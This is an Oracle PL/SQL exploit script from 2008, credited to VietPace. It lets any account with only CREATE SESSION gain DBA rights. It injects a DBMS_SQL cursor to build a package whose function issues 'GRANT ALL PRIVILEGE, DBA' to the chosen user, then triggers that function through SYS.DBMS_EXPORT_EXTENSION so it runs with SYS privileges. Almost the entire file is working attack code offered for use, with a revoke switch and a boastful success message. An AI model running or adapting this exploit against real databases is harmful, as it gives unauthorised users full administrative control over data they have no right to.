-- ----------------------------------------------------------------------------- -- www.vietpace.com | www.baomatoracle.com -- ----------------------------------------------------------------------------- -- Script Name : dbms_exp_ext_c_local.sql -- Author : VietPace -- Date : Oct 2008 -- ----------------------------------------------------------------------------- -- Description : This script can be used to Grant or revoke dba permission to -- unprivileged user. -- -- Refer : Andrea "bunker" Purificato -- -- Requirement : 1. CREATE SESSION -- ----------------------------------------------------------------------------- -- Maintainer : VietPace (www.vietpace.com | www.baomatoracle.com) -- Copyright : Copyright (C) 2008 www.vietpace.com Limited. All rights -- reserved. All registered trademarks are the property of their -- respective owners and are hereby acknowledged. -- ----------------------------------------------------------------------------- -- Usage : The script provided here is available free. You can do anything -- you want with it commercial or non commercial as long as the -- copyrights and this notice are not removed or edited in any way. -- The scripts cannot be posted / published / hosted or whatever -- anywhere else except at www.vietpace.com | www.baomatoracle.com -- ----------------------------------------------------------------------------- -- Version History -- =============== -- -- Who version Date Description -- === ======= ====== ====================== -- VietPace 1.0 19 Oct 2008 First Issue. -- VietPace 1.0 20 Oct 2008 Change to local attack. -- ----------------------------------------------------------------------------- whenever sqlerror exit rollback set feed on set head on set arraysize 1 set space 1 set verify off set pages 25 set lines 80 set termout on clear screen set serveroutput on size 1000000 spool dbms_exp_ext_c.lis undefine user_name undefine grant_revoke set feed off col system_date noprint new_value val_system_date select to_char(sysdate,'Dy Mon dd hh24:mi:ss yyyy') system_date from sys.dual; prompt dbms_exp_ext_c: Release 1.0 - Production on &val_system_date prompt Copyright (c) 2008 WWW.VIETPACE.COM Limited. All rights reserved. set feed on prompt accept user_name char prompt 'USERNAME TO CHECK [SCOTT]: ' default SCOTT accept grant_revoke char prompt 'PRIVS CONTROL [G]rant/[R]evoke [G]: ' default G prompt declare -- lv_grant_revoke varchar2(1) := 'G'; lv_sqlcmd varchar2(1000):= 'GRANT ALL PRIVILEGE, DBA TO ' ||upper('&&user_name'); lv_evil_cursor varchar2(1000); lv_cursor_output varchar2(100); lv_nol number := 2; lv_cursor_number varchar2(10); lv_exec_cursor varchar2(1000); lv_run_inject_cursor varchar2(1000); -- -- begin dbms_output.enable(1000000); lv_grant_revoke:=upper('&&grant_revoke'); if lv_grant_revoke='R' then dbms_output.put_line('--- REVOKING DBA FROM '||upper('&&user_name')||'...'); lv_sqlcmd := 'REVOKE ALL PRIVILEGE, DBA FROM ' || upper('&&user_name'); execute immediate lv_sqlcmd; dbms_output.put_line('--- DONE!'); return; end if; lv_evil_cursor := 'DECLARE MYC_PKG_1 NUMBER;'|| 'BEGIN MYC_PKG_1 := DBMS_SQL.OPEN_CURSOR; ' || 'DBMS_SQL.PARSE(MYC_PKG_1,'''|| 'CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER '|| 'IS FUNCTION ODCIIndexGetMetadata (a SYS.odciindexinfo, ' || 'b VARCHAR2,c VARCHAR2, d SYS.odcienv) RETURN NUMBER; END;'',0); '|| 'DBMS_OUTPUT.PUT_LINE(''Cursor1 ''||MYC_PKG_1); END;'; --insert into app_log values(sysdate,lv_evil_cursor); commit; execute immediate lv_evil_cursor; lv_cursor_output:=''; dbms_output.get_line(lv_cursor_output,lv_nol); --insert into app_log values(sysdate,'lv_cursor_output1:'||lv_cursor_output); commit; lv_cursor_number := substr(lv_cursor_output,9); lv_exec_cursor := 'declare ret NUMBER;begin ret := sys.dbms_sql.execute('||lv_cursor_number||'); end;'; insert into app_log values(sysdate,lv_exec_cursor); commit; execute immediate lv_exec_cursor; lv_evil_cursor := 'DECLARE MYC_PKG_2 NUMBER;'|| 'BEGIN MYC_PKG_2 := DBMS_SQL.OPEN_CURSOR;' || 'DBMS_SQL.PARSE(MYC_PKG_2,'''|| 'CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS '|| 'FUNCTION ODCIIndexGetMetadata (a SYS.odciindexinfo, b VARCHAR2,'|| 'c VARCHAR2, d SYS.odcienv) RETURN NUMBER IS '|| 'PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''' || lv_sqlcmd ||''''';'||' COMMIT; RETURN(1); END;END;'',0); '|| 'DBMS_OUTPUT.PUT_LINE(''Cursor2 ''||MYC_PKG_2); END;'; insert into app_log values(sysdate,lv_evil_cursor); commit; execute immediate lv_evil_cursor; lv_cursor_output:=''; dbms_output.get_line(lv_cursor_output,lv_nol); --insert into app_log values(sysdate,'lv_cursor_output2:'||lv_cursor_output); commit; lv_cursor_number := substr(lv_cursor_output,9); lv_exec_cursor := 'declare ret NUMBER;begin ret := sys.dbms_sql.execute('||lv_cursor_number||'); end;'; --insert into app_log values(sysdate,lv_exec_cursor); commit; execute immediate lv_exec_cursor; dbms_output.put_line('--- CHECK CURSOR INJECTION'); lv_run_inject_cursor := 'DECLARE PLS PLS_INTEGER; '|| 'RET VARCHAR2(200);BEGIN RET := '|| 'SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(''A'',''' || upper('&&user_name')||''',''BUNKERPKG'','''|| upper('&&user_name')||''','''',PLS,0);END;'; --insert into app_log values(sysdate,lv_run_inject_cursor); --commit; execute immediate lv_run_inject_cursor; dbms_output.put_line('--- WE GOT THE POWAH!!'); exception when others then dbms_output.put_line('ERROR: '||sqlcode); dbms_output.put_line('MSG: '||sqlerrm); end; / prompt prompt For updates please visit WWW.VIETPACE.COM | WWW.BAOMATORACLE.COM prompt spool off whenever sqlerror continue